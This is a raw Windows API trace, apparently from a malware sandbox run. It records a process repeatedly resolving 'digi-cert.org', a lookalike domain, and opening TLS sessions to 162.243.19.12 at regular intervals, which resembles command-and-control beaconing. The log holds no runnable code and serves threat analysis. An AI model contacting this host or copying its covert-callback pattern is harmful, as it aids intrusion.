	[0484.696] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0484.698] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0484.698] CertFreeCertificateContext (pCertContext=0x2ad3bb055d0) returned 1
	[0484.699] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23b76e90, MessageSeqNo=0x0 | out: pMessage=0x2ad23b76e90) returned 0x0
	[0484.699] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca220
	[0484.699] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca220*=((len=0x3b, buf=0x2ad23b74150*), (len=0xd5, buf=0x2ad23b76c98*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca220*=((len=0x3b, buf=0x2ad23b74150*), (len=0xd5, buf=0x2ad23b76c98*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0484.702] CoTaskMemFree (pv=0x2ad3baca220) 
	[0484.702] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0484.702] recv (in: s=0x7d0, buf=0x2ad23b77038, len=5, flags=0 | out: buf=0x2ad23b77038*) returned 5
	[0485.162] recv (in: s=0x7d0, buf=0x2ad23b7705d, len=1488, flags=0 | out: buf=0x2ad23b7705d*) returned 1488
	[0485.162] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23b77740, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b77740, pfQOP=0x0) returned 0x0
	[0485.163] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0485.163] SetEvent (hEvent=0x6b8) returned 1
	[0485.214] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x388
	[0488.220] CloseHandle (hObject=0x388) returned 1
	[0488.225] strcpy_s (in: _Dst=0x2ad3bac9cb0, _DstSize=0x1b, _Src="System.Collections.Generic" | out: _Dst="System.Collections.Generic") returned 0x0
	[0488.609] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x388) returned 0x0
	[0488.610] RegOpenKeyExW (in: hKey=0x388, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x164) returned 0x0
	[0488.610] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9d0
	[0488.610] RegNotifyChangeKeyValue (hKey=0x164, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9d0, fAsynchronous=1) returned 0x0
	[0488.611] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0xe4) returned 0x0
	[0488.611] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x25c
	[0488.611] RegNotifyChangeKeyValue (hKey=0xe4, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x25c, fAsynchronous=1) returned 0x0
	[0488.612] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x270) returned 0x0
	[0488.612] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x398
	[0488.612] RegNotifyChangeKeyValue (hKey=0x270, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x398, fAsynchronous=1) returned 0x0
	[0488.612] GetCurrentProcess () returned 0xffffffffffffffff
	[0488.612] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x3f4) returned 1
	[0488.613] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb1b440
	[0488.613] WinHttpSetTimeouts (hInternet=0x2ad3bb1b440, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0488.613] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0488.629] SetEvent (hEvent=0x6b8) returned 1
	[0488.631] select (in: nfds=0, readfds=0x2ad23b7f138, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b7f138, writefds=0x0, exceptfds=0x0) returned 0
	[0488.632] EncryptMessage (in: phContext=0xd7ef71bb20, fQOP=0x0, pMessage=0x2ad23b7f6d0, MessageSeqNo=0x0 | out: pMessage=0x2ad23b7f6d0) returned 0x0
	[0488.632] send (in: s=0x7d0, buf=0x2ad23b7f4d8*, len=213, flags=0 | out: buf=0x2ad23b7f4d8*) returned 213
	[0488.637] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0488.637] recv (in: s=0x7d0, buf=0x2ad23a2f170, len=5, flags=0 | out: buf=0x2ad23a2f170*) returned 5
	[0489.168] recv (in: s=0x7d0, buf=0x2ad23a2f175, len=1488, flags=0 | out: buf=0x2ad23a2f175*) returned 1488
	[0489.168] DecryptMessage (in: phContext=0xd7ef71b6e0, pMessage=0x2ad23b7f8c0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b7f8c0, pfQOP=0x0) returned 0x0
	[0489.170] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0489.170] SetEvent (hEvent=0x6b8) returned 1
	[0489.198] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4
	[0499.201] CloseHandle (hObject=0x3f4) returned 1
	[0499.429] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x3f4) returned 0x0
	[0499.429] RegOpenKeyExW (in: hKey=0x3f4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x398) returned 0x0
	[0499.430] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9cc
	[0499.430] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9cc, fAsynchronous=1) returned 0x0
	[0499.430] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x388) returned 0x0
	[0499.431] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0499.431] RegNotifyChangeKeyValue (hKey=0x388, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0499.432] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9d0) returned 0x0
	[0499.432] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0499.432] RegNotifyChangeKeyValue (hKey=0x9d0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0499.433] GetCurrentProcess () returned 0xffffffffffffffff
	[0499.433] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x25c) returned 1
	[0499.433] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb198a0
	[0499.433] WinHttpSetTimeouts (hInternet=0x2ad3bb198a0, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0499.433] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0499.450] SetEvent (hEvent=0x6b8) returned 1
	[0499.452] select (in: nfds=0, readfds=0x2ad23b89440, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b89440, writefds=0x0, exceptfds=0x0) returned 1
	[0499.452] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0499.454] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0499.455] shutdown (s=0x7d0, how=2) returned 0
	[0499.465] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0499.465] closesocket (s=0x7d0) returned 0
	[0499.467] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0499.468] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d4
	[0499.469] CoTaskMemAlloc (cb=0xf) returned 0x2ad3bb1ede0
	[0499.469] getaddrinfo (in: pNodeName="digi-cert.org", pServiceName=0x0, pHints=0xd7ef71bb20*(ai_flags=2, ai_family=0, ai_socktype=0, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0xd7ef71bb18 | out: ppResult=0xd7ef71bb18*=0x2ad3bb03a80*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="digi-cert.org", ai_addr=0x2ad3bb1efe0*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) returned 0
	[0499.474] CoTaskMemFree (pv=0x2ad3bb1ede0) 
	[0499.474] CoTaskMemFree (pv=0x0) 
	[0499.475] FreeAddrInfoW (pAddrInfo=0x2ad3bb03a80*(ai_flags=0, ai_family=2, ai_socktype=0, ai_protocol=0, ai_addrlen=0x10, ai_canonname="楤楧挭牥⹴牯g⻷", ai_addr=0x2ad3bb1efe0*(sa_family=2, sin_port=0x0, sin_addr="162.243.19.12"), ai_next=0x0)) 
	[0499.475] WSAConnect (in: s=0x7d0, name=0x2ad23b8af78*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0499.583] closesocket (s=0x9d4) returned 0
	[0499.584] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23b87b80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23b8b800, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23b8b800, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0499.585] FreeContextBuffer (in: pvContextBuffer=0x2ad3badf7e0 | out: pvContextBuffer=0x2ad3badf7e0) returned 0x0
	[0499.585] send (in: s=0x7d0, buf=0x2ad23b8b8d0*, len=333, flags=0 | out: buf=0x2ad23b8b8d0*) returned 333
	[0499.586] recv (in: s=0x7d0, buf=0x2ad23b8b8d0, len=5, flags=0 | out: buf=0x2ad23b8b8d0*) returned 5
	[0499.697] recv (in: s=0x7d0, buf=0x2ad23b8b8d5, len=49, flags=0 | out: buf=0x2ad23b8b8d5*) returned 49
	[0499.699] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23b87b80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b8bb10, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b8bb30, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b8bb30, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0499.700] recv (in: s=0x7d0, buf=0x2ad23b8bc20, len=5, flags=0 | out: buf=0x2ad23b8bc20*) returned 5
	[0499.700] recv (in: s=0x7d0, buf=0x2ad23b8bc45, len=1, flags=0 | out: buf=0x2ad23b8bc45*) returned 1
	[0499.700] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23b87b80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b8bd18, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b8bd38, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b8bd38, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0499.701] recv (in: s=0x7d0, buf=0x2ad23b8be28, len=5, flags=0 | out: buf=0x2ad23b8be28*) returned 5
	[0499.701] recv (in: s=0x7d0, buf=0x2ad23b8be4d, len=48, flags=0 | out: buf=0x2ad23b8be4d*) returned 48
	[0499.701] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23b87b80, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b8bf50, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23b8bf70, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23b8bf70, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0499.703] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad3620 | out: pvContextBuffer=0x2ad3bad3620) returned 0x0
	[0499.703] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23b8c0b8 | out: pBuffer=0x2ad23b8c0b8) returned 0x0
	[0499.703] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23b8c110 | out: pBuffer=0x2ad23b8c110) returned 0x0
	[0499.704] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23b8c178 | out: pBuffer=0x2ad23b8c178) returned 0x0
	[0499.705] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04dd0) returned 0x2ad3bb04dd0
	[0499.705] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0499.706] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb04dd0
	[0499.707] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04dd0) returned 0x2ad3bb04dd0
	[0499.707] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb04dd0) returned 0x0
	[0499.707] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0499.708] CertFreeCertificateContext (pCertContext=0x2ad3bb04dd0) returned 1
	[0499.710] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0499.710] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb04dd0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
	[0499.711] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x2ad3bb04dd0, pTime=0xd7ef71b448, hAdditionalStore=0x2ad3bad10c0, pChainPara=0xd7ef71b450, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xd7ef71b440 | out: ppChainContext=0xd7ef71b440) returned 1
	[0499.714] CertDuplicateCertificateChain (pChainContext=0x2ad3babb8d0) returned 0x2ad3babb8d0
	[0499.716] CertDuplicateCertificateContext (pCertContext=0x2ad3bb04dd0) returned 0x2ad3bb04dd0
	[0499.718] CertDuplicateCertificateContext (pCertContext=0x2ad3bb05450) returned 0x2ad3bb05450
	[0499.719] CertDuplicateCertificateContext (pCertContext=0x2ad3bb065d0) returned 0x2ad3bb065d0
	[0499.719] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0499.719] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b5c8, pPolicyStatus=0xd7ef71b5a8 | out: pPolicyStatus=0xd7ef71b5a8) returned 1
	[0499.719] SetLastError (dwErrCode=0x0) 
	[0499.719] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x2ad3babb8d0, pPolicyPara=0xd7ef71b6a0, pPolicyStatus=0xd7ef71b688 | out: pPolicyStatus=0xd7ef71b688) returned 1
	[0499.721] CertFreeCertificateChain (pChainContext=0x2ad3babb8d0) 
	[0499.721] CertFreeCertificateContext (pCertContext=0x2ad3bb04dd0) returned 1
	[0499.722] EncryptMessage (in: phContext=0xd7ef71b880, fQOP=0x0, pMessage=0x2ad23b8ed80, MessageSeqNo=0x0 | out: pMessage=0x2ad23b8ed80) returned 0x0
	[0499.723] CoTaskMemAlloc (cb=0x20) returned 0x2ad3baca130
	[0499.723] WSASend (in: s=0x7d0, lpBuffers=0x2ad3baca130*=((len=0x3b, buf=0x2ad23b8c040*), (len=0xd5, buf=0x2ad23b8eb88*)), dwBufferCount=0x2, lpNumberOfBytesSent=0xd7ef71b9e8, dwFlags=0x0, lpOverlapped=0x0, lpCompletionRoutine=0x0 | out: lpBuffers=0x2ad3baca130*=((len=0x3b, buf=0x2ad23b8c040*), (len=0xd5, buf=0x2ad23b8eb88*)), lpNumberOfBytesSent=0xd7ef71b9e8*=0x110, lpOverlapped=0x0) returned 0
	[0499.723] CoTaskMemFree (pv=0x2ad3baca130) 
	[0499.724] setsockopt (s=0x7d0, level=65535, optname=4102, optval=" \x86\x01", optlen=4) returned 0
	[0499.724] recv (in: s=0x7d0, buf=0x2ad23b8ef28, len=5, flags=0 | out: buf=0x2ad23b8ef28*) returned 5
	[0500.209] recv (in: s=0x7d0, buf=0x2ad23b8ef4d, len=1488, flags=0 | out: buf=0x2ad23b8ef4d*) returned 1488
	[0500.210] DecryptMessage (in: phContext=0xd7ef71b570, pMessage=0x2ad23b8f630, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x2ad23b8f630, pfQOP=0x0) returned 0x0
	[0500.210] setsockopt (s=0x7d0, level=65535, optname=4102, optval="à\x93\x04", optlen=4) returned 0
	[0500.210] SetEvent (hEvent=0x6b8) returned 1
	[0500.245] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f4
	[0519.252] CloseHandle (hObject=0x3f4) returned 1
	[0519.263] _vsnwprintf_s (in: _Buffer=0xd7ef71bf18, _BufferCount=0x19, _MaxCount=0x18, _Format="%hu.", _ArgList=0xd7ef71be88 | out: _Buffer="2.") returned 2
	[0519.568] log (_X=0x2ad23b79a90) returned 0x5cfe0000
	[0519.598] RegOpenCurrentUser (in: samDesired=0x20019, phkResult=0xd7ef71c380 | out: phkResult=0xd7ef71c380*=0x3f4) returned 0x0
	[0519.599] RegOpenKeyExW (in: hKey=0x3f4, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c268 | out: phkResult=0xd7ef71c268*=0x398) returned 0x0
	[0519.599] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x9cc
	[0519.599] RegNotifyChangeKeyValue (hKey=0x398, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x9cc, fAsynchronous=1) returned 0x0
	[0519.600] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Connections", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x388) returned 0x0
	[0519.600] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x164
	[0519.600] RegNotifyChangeKeyValue (hKey=0x388, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0x164, fAsynchronous=1) returned 0x0
	[0519.602] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows\\CurrentVersion\\Internet Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0xd7ef71c290 | out: phkResult=0xd7ef71c290*=0x9d0) returned 0x0
	[0519.603] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe4
	[0519.603] RegNotifyChangeKeyValue (hKey=0x9d0, bWatchSubtree=1, dwNotifyFilter=0x4, hEvent=0xe4, fAsynchronous=1) returned 0x0
	[0519.603] GetCurrentProcess () returned 0xffffffffffffffff
	[0519.603] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xd7ef71c1f8 | out: TokenHandle=0xd7ef71c1f8*=0x25c) returned 1
	[0519.604] WinHttpOpen (pszAgentW=0x0, dwAccessType=0x1, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2ad3bb1a780
	[0519.604] WinHttpSetTimeouts (hInternet=0x2ad3bb1a780, nResolveTimeout=60000, nConnectTimeout=60000, nSendTimeout=60000, nReceiveTimeout=60000) returned 1
	[0519.604] WinHttpGetIEProxyConfigForCurrentUser (in: pProxyConfig=0xd7ef71c2d8 | out: pProxyConfig=0xd7ef71c2d8) returned 1
	[0519.622] SetEvent (hEvent=0x6b8) returned 1
	[0519.623] select (in: nfds=0, readfds=0x2ad23b96d48, writefds=0x0, exceptfds=0x0, timeout=0xd7ef71bf90 | out: readfds=0x2ad23b96d48, writefds=0x0, exceptfds=0x0) returned 1
	[0519.624] QueryContextAttributesW (in: phContext=0xd7ef71be20, ulAttribute=0x1a, pBuffer=0xd7ef71bfa0 | out: pBuffer=0xd7ef71bfa0) returned 0x0
	[0519.626] DeleteSecurityContext (phContext=0xd7ef71b5f0) returned 0x0
	[0519.627] shutdown (s=0x7d0, how=2) returned 0
	[0519.653] setsockopt (s=0x7d0, level=65535, optname=128, optval="\x01", optlen=4) returned 0
	[0519.653] closesocket (s=0x7d0) returned 0
	[0519.655] WSASocketW (af=2, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x7d0
	[0519.655] WSASocketW (af=23, type=1, protocol=6, lpProtocolInfo=0x0, g=0x0, dwFlags=0x1) returned 0x9d4
	[0519.656] WSAConnect (in: s=0x7d0, name=0x2ad23b984e0*(sa_family=2, sin_port=0x1bb, sin_addr="162.243.19.12"), namelen=16, lpCallerData=0x0, lpCalleeData=0x0, lpSQOS=0x0, lpGQOS=0x0 | out: lpCalleeData=0x0) returned 0
	[0519.786] closesocket (s=0x9d4) returned 0
	[0519.788] InitializeSecurityContextW (in: phCredential=0xd7ef71b580, phContext=0x0, pTargetName=0x2ad23b95488, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0xd7ef71b570, pOutput=0x2ad23b98d68, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560 | out: phNewContext=0xd7ef71b570, pOutput=0x2ad23b98d68, pfContextAttr=0xd7ef71b568, ptsExpiry=0xd7ef71b560) returned 0x90312
	[0519.794] FreeContextBuffer (in: pvContextBuffer=0x2ad3badff10 | out: pvContextBuffer=0x2ad3badff10) returned 0x0
	[0519.794] send (in: s=0x7d0, buf=0x2ad23b98e38*, len=333, flags=0 | out: buf=0x2ad23b98e38*) returned 333
	[0519.794] recv (in: s=0x7d0, buf=0x2ad23b98e38, len=5, flags=0 | out: buf=0x2ad23b98e38*) returned 5
	[0519.908] recv (in: s=0x7d0, buf=0x2ad23b98e3d, len=49, flags=0 | out: buf=0x2ad23b98e3d*) returned 49
	[0519.908] InitializeSecurityContextW (in: phCredential=0xd7ef71b4b0, phContext=0xd7ef71b760, pTargetName=0x2ad23b95488, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b99078, Reserved2=0x0, phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b99098, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490 | out: phNewContext=0xd7ef71b4a0, pOutput=0x2ad23b99098, pfContextAttr=0xd7ef71b498, ptsExpiry=0xd7ef71b490) returned 0x90312
	[0519.910] recv (in: s=0x7d0, buf=0x2ad23b99188, len=5, flags=0 | out: buf=0x2ad23b99188*) returned 5
	[0519.910] recv (in: s=0x7d0, buf=0x2ad23b991ad, len=1, flags=0 | out: buf=0x2ad23b991ad*) returned 1
	[0519.910] InitializeSecurityContextW (in: phCredential=0xd7ef71b3f0, phContext=0xd7ef71b6a0, pTargetName=0x2ad23b95488, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b99280, Reserved2=0x0, phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b992a0, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0 | out: phNewContext=0xd7ef71b3e0, pOutput=0x2ad23b992a0, pfContextAttr=0xd7ef71b3d8, ptsExpiry=0xd7ef71b3d0) returned 0x90312
	[0519.911] recv (in: s=0x7d0, buf=0x2ad23b99390, len=5, flags=0 | out: buf=0x2ad23b99390*) returned 5
	[0519.911] recv (in: s=0x7d0, buf=0x2ad23b993b5, len=48, flags=0 | out: buf=0x2ad23b993b5*) returned 48
	[0519.911] InitializeSecurityContextW (in: phCredential=0xd7ef71b330, phContext=0xd7ef71b5e0, pTargetName=0x2ad23b95488, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x2ad23b994b8, Reserved2=0x0, phNewContext=0xd7ef71b320, pOutput=0x2ad23b994d8, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310 | out: phNewContext=0xd7ef71b320, pOutput=0x2ad23b994d8, pfContextAttr=0xd7ef71b318, ptsExpiry=0xd7ef71b310) returned 0x0
	[0519.912] FreeContextBuffer (in: pvContextBuffer=0x2ad3bad34a0 | out: pvContextBuffer=0x2ad3bad34a0) returned 0x0
	[0519.913] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x4, pBuffer=0x2ad23b99620 | out: pBuffer=0x2ad23b99620) returned 0x0
	[0519.913] QueryContextAttributesW (in: phContext=0xd7ef71b590, ulAttribute=0x5a, pBuffer=0x2ad23b99678 | out: pBuffer=0x2ad23b99678) returned 0x0
	[0519.913] QueryContextAttributesW (in: phContext=0xd7ef71b440, ulAttribute=0x53, pBuffer=0x2ad23b996e0 | out: pBuffer=0x2ad23b996e0) returned 0x0
	[0519.914] CertDuplicateCertificateContext (pCertContext=0x2ad3bb049d0) returned 0x2ad3bb049d0
	[0519.914] CertDuplicateStore (hCertStore=0x2ad22c7b2a0) returned 0x2ad22c7b2a0
	[0519.914] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x0) returned 0x2ad3bb049d0
	[0519.914] CertDuplicateCertificateContext (pCertContext=0x2ad3bb049d0) returned 0x2ad3bb049d0
	[0519.914] CertEnumCertificatesInStore (hCertStore=0x2ad22c7b2a0, pPrevCertContext=0x2ad3bb049d0) returned 0x0
	[0519.915] CertCloseStore (hCertStore=0x2ad22c7b2a0, dwFlags=0x0) returned 1
	[0519.915] CertFreeCertificateContext (pCertContext=0x2ad3bb049d0) returned 1
	[0519.916] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x2ad3bad10c0
	[0519.916] CertAddCRLLinkToStore (in: hCertStore=0x2ad3bad10c0, pCrlContext=0x2ad3bb049d0, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1
